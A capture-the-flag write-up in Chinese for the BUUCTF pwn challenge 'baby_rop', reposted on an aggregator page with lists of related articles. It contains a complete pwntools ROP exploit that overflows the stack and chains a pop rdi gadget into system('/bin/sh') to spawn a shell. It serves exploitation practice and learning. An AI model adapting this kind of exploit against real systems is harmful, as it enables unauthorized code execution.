【BUUCTF - PWN】baby_rop - 代码天地

【BUUCTF - PWN】baby_rop

其他 2020-04-13 21:23:48 阅读次数: 0

checksec一下，栈溢出

IDA打开看看，很明显的溢出点，/bin/sh字符串在程序里也有现成的，通过ROPgadget找到pop rdi命令即可将/bin/sh作为参数调用system

from pwn import *
from LibcSearcher import *

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)

io=remote('xxx',xxx)

pop_rdi=0x400683
binsh=0x601048
system=0x400490

ru('? ')
payload=p64(0)*3+p64(pop_rdi)+p64(binsh)+p64(system)
sl(payload)

io.interactive()

附件：baby_rop

发布了30 篇原创文章 · 获赞 9 · 访问量 7382

私信关注

猜你喜欢

转载自blog.csdn.net/tqydyqt/article/details/105321640

【BUUCTF - PWN】baby_rop

BUUCTF(pwn)[HarekazeCTF2019]baby_rop

[BUUCTF]PWN——[HarekazeCTF2019]baby_rop

[HarekazeCTF2019]baby_rop

Buuctf(pwn) picoctf_2018_rop chain 栈溢出

【BUUCTF - PWN】rip

【BUUCTF - PWN】babyrop

buuctf-pwn babyrop

BUUCTF(Pwn) rip

buuctf pwn （21~24）

buuctf pwn （17~20）

buuctf pwn（13~16）

buuctf pwn（9~12）

buuctf pwn（5~8）

buuctf pwn（1~4）

【BUUCTF - PWN】PWN5

[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop

buuctf pwn （inndy_rop）（cmcc_simplerop）（[ZJCTF 2019]Login）

BUUCTF PWN部分题目wp

buuctf --pwn part2

BUUCTF-PWN-cmcc_simplerop

[BUUCTF]PWN——jarvisoj_fm

【BUUCTF - PWN】pwn1_sctf_2016

[BUUCTF]PWN——suctf_2018_basic pwn

buuctf

BUUCTF |

buuctf@pwn1_sctf_2016

buuctf pwn wp---part1

CTF-BUUCTF-Pwn-test_your_nc

【BUUCTF - PWN】jarvisoj_level2

今日推荐

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

国产云输入法——仅华为无云端数据上传安全问题

开源日报 | 工业开源项目OGG 1.0；姐姐，你要和我一起配置火狐吗；苹果AI遥遥落后？Fedora 40

开放签电子签章：停止新增，优化体验，前进更进（五一假期前工作）

开源日报 | 中学生开源前端动画引擎；全球首个Llama3 8B中文版开源模型；联想电脑恐出局；Linus讽刺AI炒作

周排行

浏览器对同一域名进行请求的最大并发连接数

React Hook之自定义Hook

【转】MyBatis缓存机制

-Java-泛型

自动化测试常用脚本-发送邮件

LeetCode#859: Buddy Strings

java、Python处理字符串

第二篇の博客

Hadoop伪分布式环境安装

SQL Server进阶（十一）临时表、表变量

每日归档

更多

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)

2024-04-21(0)

2024-04-20(6)

2024-04-19(5)

2024-04-18(0)